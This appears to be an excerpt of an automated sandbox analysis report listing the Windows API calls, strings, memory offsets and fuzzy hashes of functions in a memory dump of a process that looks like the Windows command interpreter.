                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _get_osfhandle$ConsoleMode
                                                      • String ID:
                                                      • API String ID: 1591002910-0
                                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                      • Instruction ID: 216e250ae6028ed110bb4dc2e752556e834848768ba7dcd4d40c82de3a7cc494
                                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                      • Instruction Fuzzy Hash: F1F07A35E09612DBE708EB11E846278BBA0FB8D712F849176C90E43318DFBDA6158B52
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: DriveType
                                                      • String ID: :
                                                      • API String ID: 338552980-336475711
                                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                      • Instruction ID: b48dd3106c801b34b5690048f068c129aba883d9bf9a6e9cffd87956715695bb
                                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                      • Instruction Fuzzy Hash: 17E0E56361860086D720DB60E05216AF760FB8D348FC41535DA8D83724DB3CC149CF08
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF7E1DC5B52
                                                        • Part of subcall function 00007FF7E1DC4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC4297
                                                        • Part of subcall function 00007FF7E1DC4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC42D7
                                                        • Part of subcall function 00007FF7E1DC4224: memset.MSVCRT ref: 00007FF7E1DC42FD
                                                        • Part of subcall function 00007FF7E1DC4224: memset.MSVCRT ref: 00007FF7E1DC4368
                                                        • Part of subcall function 00007FF7E1DC4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC4380
                                                        • Part of subcall function 00007FF7E1DC4224: wcsrchr.MSVCRT ref: 00007FF7E1DC43E6
                                                        • Part of subcall function 00007FF7E1DC4224: lstrcmpW.KERNELBASE ref: 00007FF7E1DC4401
                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7E1DC5BC7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                      • String ID:
                                                      • API String ID: 497088868-0
                                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                      • Instruction ID: edc33e9e8be908d7abf96c7fe26e3ee58fdd66b423c3ae8458e08e92c3e1645d
                                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                      • Instruction Fuzzy Hash: 86318660B0C64252EB24F711A4527BDE251FF89B80FC45533E94E87B95DEBCE501C751
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
Similarity
• API ID: Concurrency::cancel_current_taskmalloc
• String ID:
• API String ID: 1412018758-0
• Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
• Instruction ID: c141a1231c0784de808bbc5dc15d594d55d3f3aa7a6d97349a80aab13a6c33dc
• Instruction Fuzzy Hash: B9E06D01F0920B91FF1CBBA668433B592505F18B41E981832DD0E45382EEBCA092C3B2
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
• Instruction ID: e5378ca871b63f4bd2260f7fbee4b83aaaac386cbc538f7548cc47fa8c93c057
• Instruction Fuzzy Hash: 3DF08171E1864292EB04EB05F842279FBA0FB89B00BD99436D90E03358DF7CE451CB21
APIs
Similarity
• API ID: exit
• String ID:
• API String ID: 2483651598-0
• Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
• Instruction ID: 3b7111ea554a2566a935c7083ea295116cedc959218ebbbb6273de37de37a98d
• Instruction Fuzzy Hash: 62C01230B0464687EB2DB731655213995A55B08201F445839C50781291DEBCD404C651
APIs
Similarity
• API ID: DefaultUser
• String ID:
• API String ID: 3358694519-0
• Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
• Instruction ID: 6a13f1da88f1832a94415aa2d532eca9800ca3ee00203dc3715e58e649fc3df6
• Instruction Fuzzy Hash: A7E0C2E2E282538AF7587E4160833B49953CB78782FC44833C60D812C54A7D3841D62A
APIs
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
• Instruction ID: 949c500cb173571034c3ff60e986ffb564b611ad2e03e88f6bb6363581f32aa7
• Instruction Fuzzy Hash: 3CF0B421B0978540EB44D756B94126A92919B88BF0B888332EA7D47BC5DF7CD452C701
APIs
Strings
Similarity
• API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
• String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
• API String ID: 1388555566-2647954630
• Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
• Instruction ID: e9719496577a3cf59c84c333d1f5afbffe0d51d99cd6fe2b465abcbf5720b4c9
• Instruction Fuzzy Hash: 80A2A671E08B8296EB14EB25E4063B9F7A1FB49745F848236DA0E87794DFBCE404C712
APIs
Strings
Similarity
• API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
• String ID: &<|>$+: $:$:EOF$=,;$^
• API String ID: 511550188-726566285
• Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
• Instruction ID: 5602147798342c19a277fde28cc6eb7f2de45df1362b423825bc3f769b903aa8
• Instruction Fuzzy Hash: D7520422E0C69296EB24EB159402779EAA5FF49741FC88537DA0F43794DFBCE840C762
APIs
Strings
Similarity
• API ID: _wcsnicmp$wcschr$wcstol
• String ID: delims=$eol=$skip=$tokens=$useback$usebackq
• API String ID: 1738779099-3004636944
• Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
• Instruction ID: a9e43ad1bb1664594fd9f0dddbca34ff0cd55b3ae89f3af7f9d8098861a926c3
• Instruction Fuzzy Hash: CD729031F0865296EB14EF659046BBDB7A1FB44B88FC08036CE0E57784DEBCA815C362
APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7F44
• _get_osfhandle.MSVCRT ref: 00007FF7E1DD7F5C
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7F9E
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7FFF
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8020
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8036
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8061
• RtlFreeHeap.NTDLL ref: 00007FF7E1DD8075
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD80D6
• RtlFreeHeap.NTDLL ref: 00007FF7E1DD80EA
• _wcsnicmp.MSVCRT ref: 00007FF7E1DD8177
• _wcsnicmp.MSVCRT ref: 00007FF7E1DD819A
• _wcsnicmp.MSVCRT ref: 00007FF7E1DD81BD
• _wcsnicmp.MSVCRT ref: 00007FF7E1DD81DC
• _wcsnicmp.MSVCRT ref: 00007FF7E1DD81FB
• _wcsnicmp.MSVCRT ref: 00007FF7E1DD821A
• _wcsnicmp.MSVCRT ref: 00007FF7E1DD8239
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8291
• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD82D7
• FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD82FB
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD831A
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8364
• RtlFreeHeap.NTDLL ref: 00007FF7E1DD8378
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD839A
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD83AE
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD83E6
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8403
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8418
Strings
Similarity
• API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
• String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
• API String ID: 3637805771-3100821235
• Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
• Instruction ID: 50b8edd5e4967aa8ef46c3fbe87ce29722abfbdbb7da3e4a53c604d6d72cf0f7
• Instruction Fuzzy Hash: 1DE1B371E08A528AE714EF65E401279FBA1FB89B95BC48236CD0E83794DFBCA454C721
APIs
Strings
Similarity
• API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
• String ID: %s$%s
• API String ID: 3623545644-3518022669
• Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
• Instruction ID: 8bb1bd6a818cec4f9da848e11d674401646a163ffa0b4eda29d8de4b4eb447a9
• Instruction Fuzzy Hash: BDD2A232A087829AEB64EF25D4427B9B7A1FB45748F80413BDA0E47B94DFBCE544C712
APIs
Strings
Similarity
• API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
• String ID: %9d$%s
• API String ID: 4286035211-3662383364
• Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
• Instruction ID: 310cd20fc843730ea8b54c55e80d2109bbe191c022eafba9ef6a6570dc587a45
• Instruction Fuzzy Hash: 1852B232A08B829AEB24EB24D8517FDB7A0FB85759F804236DA0E47794DFBCE544C711
APIs
Strings
                                                      Similarity
                                                      • API ID: wcsrchr$towlower
                                                      • String ID: fdpnxsatz
                                                      • API String ID: 3267374428-1106894203
                                                      • Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                      • Instruction ID: dda824986c0ee362af044c50050bee28ad488c2ad7ca3904a18eac69d5de03fb
                                                      • Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                      • Instruction Fuzzy Hash: 3142E032B08A92C5EB64EF25D9013B9A6A1FF45B90F848936DE0E57784DF7CE441C391
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                      • String ID: DPATH
                                                      • API String ID: 95024817-2010427443
                                                      • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                      • Instruction ID: d2b2fc0f614502a16793e8695fb2de72e3948192ca774fda0629f41a764c7a8c
                                                      • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                      • Instruction Fuzzy Hash: A712E932A0868297EB25EF259441379F7A1FF89754F84523AEA4E53B94DF7CE400CB12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                      • API String ID: 0-1980097535
                                                      • Opcode ID: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                      • Instruction ID: 2c0b49213b0ea372839dfc996fc151596e6cc1c3d587b621cd039270ea36e0ac
                                                      • Opcode Fuzzy Hash: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                      • Instruction Fuzzy Hash: 7832B072A0878396EB24EF25D8427F9B3A0EB45784FC18236DA0D47695DFBCE505C722
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                      • API String ID: 1795611712-3662956551
                                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                      • Instruction ID: e221b39cc7f47288ab9205f581d82e3da46226a49a7ba4837ed2038dd9771ab8
                                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                      • Instruction Fuzzy Hash: A7E1C362E0C64296E711EB64A8427B9E7A1FF48784FC44233D90E87698DFBCE544C762
                                                      APIs
                                                      • _wcsupr.MSVCRT ref: 00007FF7E1DDEF33
                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEF98
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFA9
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFBF
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7E1DDEFDC
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFED
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF003
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF022
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF083
                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF092
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF0A5
                                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7E1DDF0DB
                                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF135
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF16C
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF185
                                                        • Part of subcall function 00007FF7E1DC01B8: _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                        • Part of subcall function 00007FF7E1DC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                      • String ID: <noalias>$CMD.EXE
                                                      • API String ID: 1161012917-1690691951
                                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                      • Instruction ID: bc9efa534f7194d580a059115afa4fb9067c02078aa670097b56e4856e0557a9
                                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                      • Instruction Fuzzy Hash: 74918422F0965296FB15FB70D4423BDBAA0AF49B59F848236DD0E43794DFBCA445C322
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DB32F3
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7E1DB32A4), ref: 00007FF7E1DB3309
